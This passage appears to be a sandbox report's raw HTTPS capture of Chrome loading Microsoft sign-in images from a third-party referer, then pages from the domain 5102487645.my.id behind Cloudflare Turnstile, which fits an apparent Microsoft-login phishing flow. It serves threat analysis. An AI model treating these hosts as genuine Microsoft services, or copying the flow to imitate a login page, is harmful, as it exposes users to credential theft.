                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:45 UTC806INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:45 GMT
                                                                                                                  Content-Type: image/svg+xml
                                                                                                                  Content-Length: 621
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                                                                                  ETag: 0x8D8852A7FA6B761
                                                                                                                  x-ms-request-id: 7413ac6e-101e-002a-2a27-241c46000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  x-azure-ref: 20241022T140845Z-17fbfdc98bbvcvlzx1n0fduhm000000004m00000000016dn
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L2_T2
                                                                                                                  X-Cache: TCP_REMOTE_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-10-22 14:08:45 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                                                                                  Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.1649778152.199.21.1754432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:45 UTC662OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                                                  Host: aadcdn.msftauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://apeidieppe-d.basiic.net/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:46 UTC736INHTTP/1.1 200 OK
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Age: 558226
                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                  Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                  Content-Type: image/svg+xml
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:45 GMT
                                                                                                                  Etag: 0x8D7B007297AE131
                                                                                                                  Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT
                                                                                                                  Server: ECAcc (lhc/7886)
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-request-id: 53477596-701e-00df-0778-1fca5d000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  Content-Length: 1864
                                                                                                                  Connection: close
                                                                                                                  2024-10-22 14:08:46 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  49192.168.2.164978213.107.253.724432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:46 UTC418OUTGET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                                                                                  Host: aadcdn.msauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:46 UTC799INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:46 GMT
                                                                                                                  Content-Type: image/svg+xml
                                                                                                                  Content-Length: 621
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                                                                                  ETag: 0x8D8852A7FA6B761
                                                                                                                  x-ms-request-id: 5faa7b61-301e-005c-1771-21a9a3000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  x-azure-ref: 20241022T140846Z-r1755647c66gb86l6k27ha2m1c00000005cg000000002csd
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-10-22 14:08:46 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                                                                                  Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  50192.168.2.164978313.107.253.724432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:46 UTC402OUTGET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                  Host: aadcdn.msauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:46 UTC764INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:46 GMT
                                                                                                                  Content-Type: image/x-icon
                                                                                                                  Content-Length: 17174
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                  Last-Modified: Fri, 02 Nov 2018 20:25:25 GMT
                                                                                                                  ETag: 0x8D6410152A9D7E1
                                                                                                                  x-ms-request-id: 430036bf-c01e-0015-658b-24eb48000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  x-azure-ref: 20241022T140846Z-r1755647c66dj7986akr8tvaw400000006700000000001ha
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L2_T2
                                                                                                                  X-Cache: TCP_REMOTE_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-10-22 14:08:46 UTC15620INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                  Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                  2024-10-22 14:08:46 UTC1554INData Raw: 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 00 00 01 80 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33
                                                                                                                  Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  51192.168.2.1649785152.199.21.1754432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:47 UTC419OUTGET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                                                                  Host: aadcdn.msftauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:47 UTC736INHTTP/1.1 200 OK
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Age: 558228
                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                  Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                  Content-Type: image/svg+xml
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:47 GMT
                                                                                                                  Etag: 0x8D7B007297AE131
                                                                                                                  Last-Modified: Wed, 12 Feb 2020 22:01:50 GMT
                                                                                                                  Server: ECAcc (lhc/7886)
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-request-id: 53477596-701e-00df-0778-1fca5d000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  Content-Length: 1864
                                                                                                                  Connection: close
                                                                                                                  2024-10-22 14:08:47 UTC1864INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31 34 30 31 2e 36
                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  52192.168.2.1649789162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:51 UTC667OUTGET /next.php HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:51 UTC150INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:50 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  53192.168.2.1649788162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:51 UTC596OUTGET /favicon.ico HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://5102487645.my.id/next.php
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:51 UTC164INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:50 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Length: 315
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  2024-10-22 14:08:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  54192.168.2.1649793162.241.71.1264432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:58 UTC659OUTGET / HTTP/1.1
                                                                                                                  Host: 5102487645.my.id
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:58 UTC333INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:57 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Set-Cookie: PHPSESSID=69f617384d08c6c83f3a20d1d5f3410a; path=/
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  2024-10-22 14:08:58 UTC3603INData Raw: 65 30 37 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 70 65 74 72 69 63 68 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 3c 73 70 61 6e 3e 41 73 20 74 68 65 20 66 69 72 73 74 20 6e 6f 74 65 73 20 6f 66 20 74 68 65 20 73 79 6d 70 68 6f 6e 79 20 66 69 6c 6c 65 64 20 74 68 65 20 63 6f 6e 63 65 72 74 20 68 61 6c 6c 2c 20 74 68 65 20 61 75 64 69 65 6e 63 65 20 77 61 73 20 74 72 61 6e 73 70 6f 72 74 65 64 20 69 6e 74 6f 20 61 20 77 6f 72 6c 64 20 6f 66 20 6d 75 73 69 63 61 6c 20 62 65 61 75 74 79 20 61 6e 64 20 65 6d 6f 74 69
                                                                                                                  Data Ascii: e07 <html lang="en"> <head> <meta charset="UTF-8"> <title>petrichor</title> ... <span>As the first notes of the symphony filled the concert hall, the audience was transported into a world of musical beauty and emoti


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  55192.168.2.1649796104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:58 UTC544OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:08:59 UTC386INHTTP/1.1 302 Found
                                                                                                                  Date: Tue, 22 Oct 2024 14:08:59 GMT
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  access-control-allow-origin: *
                                                                                                                  cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  location: /turnstile/v0/g/f2bbd6738e15/api.js
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a10010a5d1443-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  56192.168.2.1649797104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:08:59 UTC559OUTGET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
